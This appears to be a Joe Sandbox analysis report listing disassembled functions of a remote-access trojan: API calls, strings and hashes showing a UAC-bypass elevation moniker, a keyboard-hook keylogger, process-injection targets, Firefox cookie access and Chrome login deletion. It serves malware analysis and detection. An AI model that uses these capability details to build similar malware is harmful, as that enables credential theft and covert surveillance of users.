API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
API String ID: 3756808967-1743721670
Opcode ID: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
Opcode Fuzzy Hash: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON

Download Yara Rule

Strings

5, xrefs: 00419809
3, xrefs: 00419754
7, xrefs: 0041982A
6, xrefs: 00419813
1, xrefs: 00419695
VG, xrefs: 0041968B
0, xrefs: 00419651
2, xrefs: 004196F4
4, xrefs: 004197B8

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7$VG
API String ID: 0-1861860590
Opcode ID: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
Opcode Fuzzy Hash: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00407521
CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582

Strings

[+] CoGetObject, xrefs: 00407561
{3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 00407516, 0040751B, 0040755A
[+] ucmAllocateElevatedObject, xrefs: 00407508
$, xrefs: 0040753B
Elevation:Administrator!new:, xrefs: 00407542
[-] CoGetObject FAILURE, xrefs: 0040758E
[+] CoGetObject SUCCESS, xrefs: 00407595

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Object_wcslen
String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
API String ID: 240030777-3166923314
Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
GetLastError.KERNEL32 ref: 0041A7BB
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: a92e5e22f525c5d855de5902c8743aa5aa96fd2eb9e2bef805906780dfe370d3
Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
Opcode Fuzzy Hash: a92e5e22f525c5d855de5902c8743aa5aa96fd2eb9e2bef805906780dfe370d3
Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
IsValidCodePage.KERNEL32(00000000), ref: 00452777
IsValidLocale.KERNEL32(?,00000001), ref: 00452786
GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED

Strings

lJD, xrefs: 00452745, 004526F2, 004526E7
lJD, xrefs: 00452639, 00452649, 00452709, 004526AB, 004526A0, 004526A3, 004526AE, 0045270C
lJD, xrefs: 00452626, 004527C5

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: lJD$lJD$lJD
API String ID: 745075371-479184356
Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
FindClose.KERNEL32(00000000), ref: 0040C47D
FindClose.KERNEL32(00000000), ref: 0040C4A8

Strings

\Mozilla\Firefox\Profiles\, xrefs: 0040C36E
AppData, xrefs: 0040C358
\cookies.sqlite, xrefs: 0040C409

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 1164774033-405221262
Opcode ID: 285c5e5c0a0229c45b09239667504c56f02977e4a07d16255c72b533a04b213f
Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
Opcode Fuzzy Hash: 285c5e5c0a0229c45b09239667504c56f02977e4a07d16255c72b533a04b213f
Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D

Uniqueness

Uniqueness Score: -1.00%

Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B

Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371

GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68

Uniqueness

Uniqueness Score: -1.00%

Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E

Strings

NG, xrefs: 00419B25
PG, xrefs: 00419BD5
8SG, xrefs: 00419BEB
PXG, xrefs: 00419CC8
PXG, xrefs: 00419E2E

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Find$CreateFirstNext
String ID: 8SG$PXG$PXG$NG$PG
API String ID: 341183262-3812160132
Opcode ID: 9bef10c80fe70e0faee133d49cc93cc94573d4b15d562fb7e43cf0723d442dd3
Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
Opcode Fuzzy Hash: 9bef10c80fe70e0faee133d49cc93cc94573d4b15d562fb7e43cf0723d442dd3
Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
GetLastError.KERNEL32 ref: 0040A2ED

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetMessageA.USER32 ref: 0040A33B
TranslateMessage.USER32(?), ref: 0040A34A
DispatchMessageA.USER32 ref: 0040A355

Strings

Keylogger initialization failure: error , xrefs: 0040A301

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error
API String ID: 3219506041-952744263
Opcode ID: a0c7fd995aca5085690907e56c9aea0f8c761d2d3ede884cf20f0c391cb5f383
Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
Opcode Fuzzy Hash: a0c7fd995aca5085690907e56c9aea0f8c761d2d3ede884cf20f0c391cb5f383
Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0040A416
GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
GetKeyboardLayout.USER32 ref: 0040A429
GetKeyState.USER32(00000010), ref: 0040A433
GetKeyboardState.USER32(?), ref: 0040A43E
ToUnicodeEx.USER32 ref: 0040A461
ToUnicodeEx.USER32 ref: 0040A4C1
ToUnicodeEx.USER32 ref: 0040A4FA

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
String ID:
API String ID: 1888522110-0
Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000), ref: 0041409D
RegCloseKey.ADVAPI32(?), ref: 004140A9

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 0041426A
GetProcAddress.KERNEL32(00000000), ref: 00414271

Strings

Shlwapi.dll, xrefs: 00414265
SHDeleteKeyW, xrefs: 00414260

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: d8728620bcedfbf95b0a0fc4e553f00c45b98f8cdcebe4b8e1ae684bfe74d4de
Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
Opcode Fuzzy Hash: d8728620bcedfbf95b0a0fc4e553f00c45b98f8cdcebe4b8e1ae684bfe74d4de
Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA

Uniqueness

Uniqueness Score: -1.00%

Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00449212
_free.LIBCMT ref: 00449236
_free.LIBCMT ref: 004493BD
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
_free.LIBCMT ref: 00449589

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
Opcode Fuzzy Hash: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758

Uniqueness

Uniqueness Score: -1.00%

Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D

ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
LoadLibraryA.KERNEL32(PowrProf.dll), ref: 0041686B
GetProcAddress.KERNEL32(00000000), ref: 00416872

Strings

!D@, xrefs: 00417089
PowrProf.dll, xrefs: 00416866
SetSuspendState, xrefs: 00416861

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: !D@$PowrProf.dll$SetSuspendState
API String ID: 1589313981-2876530381
Opcode ID: 9a934de52b527b267113561337be7989eb89f8ca40bdc05900ad91c88e6bd2be
Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
Opcode Fuzzy Hash: 9a934de52b527b267113561337be7989eb89f8ca40bdc05900ad91c88e6bd2be
Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513

Strings

OCP, xrefs: 00452490
['E, xrefs: 004524F3, 004524CA
ACP, xrefs: 0045245A

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP$['E
API String ID: 2299586839-2532616801
Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
GetLastError.KERNEL32 ref: 0040BA58

Strings

[Chrome StoredLogins not found], xrefs: 0040BA72
UserProfile, xrefs: 0040BA1E
[Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
Opcode Fuzzy Hash: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE

Uniqueness

Uniqueness Score: -1.00%

Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
OpenProcessToken.ADVAPI32(00000000), ref: 00417966
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
GetLastError.KERNEL32 ref: 0041799D

Strings

SeShutdownPrivilege, xrefs: 00417972

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5

Uniqueness

Uniqueness Score: -1.00%

Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00409258

Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

__CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
FindClose.KERNEL32(00000000), ref: 004093C1

Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C

FindClose.KERNEL32(00000000), ref: 004095B9

Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
String ID:
API String ID: 1824512719-0
Opcode ID: fee723c8fa6fbdea09bb1fb09cb273678bc1abf3fbb0e3cbef60bbb8d1e7d8fb
Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
Opcode Fuzzy Hash: fee723c8fa6fbdea09bb1fb09cb273678bc1abf3fbb0e3cbef60bbb8d1e7d8fb
Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9

Uniqueness

Uniqueness Score: -1.00%

Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 0041B4B9
LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3

Strings

SETTINGS, xrefs: 0041B4AC

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040966A
FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: f3eec222462579c493b4b8f660279e06dcf6d29854e56ddc35d6d2e5544d44eb
Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
Opcode Fuzzy Hash: f3eec222462579c493b4b8f660279e06dcf6d29854e56ddc35d6d2e5544d44eb
Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON

Download Yara Rule

APIs

